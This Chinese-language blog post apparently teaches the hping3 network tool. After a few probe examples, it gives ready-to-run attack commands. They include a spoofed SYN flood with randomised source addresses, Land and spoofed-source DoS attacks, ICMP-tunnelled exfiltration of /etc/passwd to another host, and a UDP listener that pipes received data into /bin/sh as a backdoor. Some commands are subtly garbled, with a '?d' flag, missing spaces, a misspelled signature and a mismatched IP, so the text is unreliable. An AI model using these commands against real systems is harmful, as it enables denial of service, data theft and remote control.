hping3网络诊断工具
hping3是一款基于TCP/IP协议的网络诊断工具,它可以发送多种类型的探测报文,并提供丰富的选项和功能来构造和测试网络协议的各种行为。
以下是关于hping3的更详细的介绍:
使用案例
以下是一些hping3的使用案例:
把自己的ip地址随机成公网地址进行攻击
执行攻击命令攻击(hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1)
发送TCP SYN探测报文:
sudo hping3 -S -p 80 <target IP>
发送TCP ACK探测报文:
sudo hping3 -A -p 80 <target IP>
发送UDP探测报文:
sudo hping3 --udp -p 123 <target IP>
发送封包为"hello"的RAW IP数据包:
sudo hping3 --rawip -p 80 -k "hello" <target IP>
使用跃点数(TTL)来确定网络拓扑结构:
sudo hping3 -p 80 -t 1-30 域名
Hping3主要有以下典型功能应用:
使用Hping3指定各种数据包字段,依次对防火墙进行详细测试
测试防火墙对ICMP包的反应、是否支持traceroute、是否开放某个端口、对防火墙进行拒绝服务攻击(DoS attack)。
例如,以LandAttack方式测试目标防火墙(Land Attack是将发送源地址设置为与目标地址相同,诱使目标机与自己不停地建立连接)
hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10
端口扫描
Hping3也可以对目标端口进行扫描。Hping3支持指定TCP各个标志位、长度等信息。以下示例可用于探测目标机的80端口是否开放:
hping3 -I eth0 -S 192.168.10.1 -p 80
其中-I eth0指定使用eth0端口,-S指定TCP包的标志位SYN,-p 80指定探测的目的端口。
hping3支持非常丰富的端口探测方式,nmap拥有的扫描方式hping3几乎都支持(除开connect方式,因为Hping3仅发送与接收包,不会维护连接,所以不支持connect方式探测)。而且Hping3能够对发送的探测进行更加精细的控制,方便用户微调探测结果。当然,Hping3的端口扫描性能及综合处理能力,无法与Nmap相比。一般使用它仅对少量主机的少量端口进行扫描。
拒绝服务攻击
使用Hping3可以很方便构建拒绝服务攻击。比如对目标机发起大量SYN连接,伪造源地址为192.168.10.99,并使用1000微秒的间隔发送各个SYN包。
其他攻击如smurf、teardrop、land attack等也很容易构建出来。
hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000
文件传输
Hping3支持通过TCP/UDP/ICMP等包来进行文件传输。相当于借助TCP/UDP/ICMP包建立隐秘隧道通讯。实现方式是开启监听端口,对检测到的签名(签名为用户指定的字符串)的内容进行相应的解析。在接收端开启服务:
hping3 192.168.1.159--listen signature --safe --icmp
监听ICMP包中的签名,根据签名解析出文件内容。在发送端使用签名打包的ICMP包发送文件:
hping3 192.168.1.108--icmp ?d 100 --sign signature --file /etc/passwd
将/etc/passwd密码文件通过ICMP包传给192.168.10.44主机。发送包大小为100字节(-d 100),发送签名为signature(-sign signature)。
木马功能
如果Hping3能够在远程主机上启动,那么可以作为木马程序启动监听端口,并在建立连接后打开shell通信。与netcat的后门功能类似。
示例:本地打开53号UDP端口(DNS解析服务)监听来自192.168.10.66主机的包含签名为signature的数据包,并将收到的数据调用/bin/sh执行。
在木马启动端:
hping3 192.168.10.66--listen signature --safe --udp -p 53 | /bin/sh
在远程控制端:
echo ls >test.cmd hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd
将包含ls命令的文件加上签名signature发送到192.168.10.44主机的53号UDP端口,包数据长度为100字节。
最后截图下全面的参数解析:
版权属于:BLOG DEWEBSTUDIO 本文作者:狒狒
原文地址: http://blog.dewebstudio.com/?post=133
版权声明:转载时必须以链接形式注明原始出处及本声明。
发表评论